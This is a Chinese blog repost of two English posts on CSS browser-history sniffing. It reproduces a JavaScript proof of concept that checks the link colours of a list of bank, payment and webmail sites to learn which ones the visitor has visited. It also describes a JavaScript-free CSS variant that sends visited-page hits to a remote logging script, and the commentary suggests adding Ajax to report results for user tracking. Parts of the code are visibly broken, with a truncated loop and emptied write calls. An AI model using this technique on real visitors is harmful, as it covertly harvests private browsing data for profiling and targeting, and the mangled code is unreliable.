初看起来好像不太可能,但是事实并非如此。
让我们来看看如何实现吧。
先说下这篇文章,估计被墙了,原文复制如下
I know where you've been
Update 2: CSS History Hack Demonstration code available. Thank you to RSnake for hosting.
Update: Removed the JS PoC from the template and pasted it below. Was messing up IE.
I updated the blog template to display some proof-of-concept browser history stealing JavaScript code. On the right side column notice the "I know where you've been" heading. Below that, if your using Firefox, Mozilla, Netscape or Safari, you should see a bunch of links to websites you've been to. Don't worry, I'm not capturing this data, only you can see it, though it does prove a point. This trick probably works in Internet Explorer, though I haven't tried to port the code to find out for sure. I wonder how long until the marketers start using this for additional visitor profiling. Feel free to view-source and find the trick.
此文道出简单解决方案,就是访问过的站点,浏览器自动会用不同的样式加以区分。于是我们用js进行测试就可以知道了! 当然只能从我们感兴趣的网站列表中逐个来排查了。
附上代码如下
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);
// popular websites. Lookup if user has visited any.
var websites = [
"http://ajaxian.com/",
"http://digg.com/",
"http://english.aljazeera.net/HomePage",
"http://ha.ckers.org",
"http://ha.ckers.org/blog/",
"http://jeremiahgrossman.blogspot.com/",
"http://login.yahoo.com/",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://reddit.com/",
"http://seoblackhat.com",
"http://slashdot.org/",
"http://techfoolery.com/",
"http://weblogs.asp.net/jezell/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bloglines.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.cenzic.com",
"http://www.cgisecurity.com",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.expedia.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.jailbabes.com",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.ntobjectives.com",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.spidynamics.com",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.watchfire.com",
"http://www.webappsec.org",
"http://www.wellsfargo.com/",
"http://www.whitehatsec.com",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"http://seoblackhat.com/",
"http://www.alexa.com/",
"http://www.youtube.com/",
"https://banking.wellsfargo.com/",
"https://commerce.blackhat.com/",
"https://online.wellsfargo.com/",
];
/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
var d = document.createElement('div');
d.id = 'xss_flag';
document.body.appendChild(d);
var d = document.createElement('table');
d.border = 0;
d.cellpadding = 5;
d.cellspacing = 10;
d.width = '90%';
d.align = 'center';
d.id = 'data';
document.body.appendChild(d);
document.write('');
for (var i = 0; i <>');
/* launch steal history */
if (is_mozilla) {
stealHistory();
}
}
function stealHistory() {
// loop through websites and check which ones have been visited
for (var i = 0; i < websites.length; i++) {
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];
document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
// check for visited
if (color == "rgb(0, 0, 255)") {
document.write('' + websites[i] + '');
} // end visited check
} // end visited website loop
} // end stealHistory method 但是用js有它的缺点,比如用户把js关闭了,就没有办法了。还有一个就是如果做用户追踪,肯定还是要把结果返回后台的,当然加点Ajax并不难。
所以呢,又有对它的改进,参考这篇文章。还是把原文放下面,以防被墙。
下面的文章已经把相关的资料都包括了,最后面还有个例子网站,里面有源码可以用,就不多说了。
Well, the server is back up and running (big thanks to id - during our upgrade there was a drive failure causing us to have to switch machines), and to celebrate I didn’t want to come back with a boring post that would make you question why you read this site. So instead I decided to play around with some CSS tricks - bare with me for a minute. I don’t know why, but I really think CSS is going to get worse over time. Anyway, as I was poking around I happened across one of the missing pieces of the puzzle to solve a simple problem in using CSS to hack - the lack of conditional logic.
Jeremiah and I spent at least an hour on the phone several months back when he was coming up with browser port scanning without JavaScript. One of the key problems with that technique, which he later overcame, was that he was unable to find any good way to do conditional logic in CSS, so instead he leaned on a browser quirk that delays the rendering of images. Watching the timing differences can help an attacker derive which ports are open and which aren’t. While very cool, it’s caused some headaches and only solved one of our problems.
Before that Jeremiah also came up with the original CSS history hack as you may or may not remember. Later on pdp came up with another variant of the same issue using a very different technique (Firefox caching). Both of those techniques were cool, but both of them also required that you have JavaScript turned on. We all know there are still people out there who think turning off JavaScript protects them from everything.
Keeping this in mind it would be great if you could create a form of conditional logic in CSS. Well I finally figured out a way. Using a hybrid of a:visited and display: attribute you can detect that the user has visited a page and more importantly perform an action based on that fact. The actions are somewhat limited if you can’t use JavaScript, however, one action is enough. The reason being, when something is set to display:none it will actually cause the HTML tag that it references to not render. Setting the background: image attribute for the visible tag to use a URL of a logging CGI script allows you to send a request to a remote webserver based on the conditional logic as mentioned above.
Now, the only lacking part is the state management, and that can easily be tied together using a unique cookie, and/or an IP address in the QUERY_STRING or anything else you want to use to identify the user. In this way, the remote website can steal history information from the user without ever once using JavaScript, or any client side programming. Click here for a proof of concept of the CSS history theft without using JavaScript. This works nearly instantly, so it is far better than the JavaScript-less intranet hacking and pdp’s version of the JavaScript CSS history hack in terms of speed. The only latency is the time it takes your browser to request the images associated with each URL you’ve visited - which is nearly instant since I don’t return any data (and thanks to browser threading). The other nice thing about this is that it works beautifully in both Internet Explorer 7.0 and Firefox 2.0.0.2 (although it doesn’t work in Opera 9.22).
I haven’t experimented much with this yet, but I also believe this could be expanded to do another form of intranet port scanning as well. Using a series of iframes and forced browsing it may be possible to detect which pages the user can access. I’m not in love with this technique because the CSS will fire too quickly so you’d have to delay the CSS from loading or make it reload with a meta refresh or something equivalent, but I also haven’t put much thought into it yet.
The ramifications of the CSS history hacking stuff is that it allows the attacker to steal information about the client, which can be useful to identify a target, to find information about the user, for use in targeted attacks, to know trending information for use in targeted advertizements or other forms of private information theft.
So now we’ve eliminated the JavaScript pre-requisite from Intranet port scanning, cross site request forgeries, session riding and of course CSS history hacking. The only thing we can’t yet do without JavaScript is read cross domain (and I stress the word yet). What else is left? I don’t mean to sound ho-hum about this, but really, what else do we have to do? Are there any nay-sayers left?
3034
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
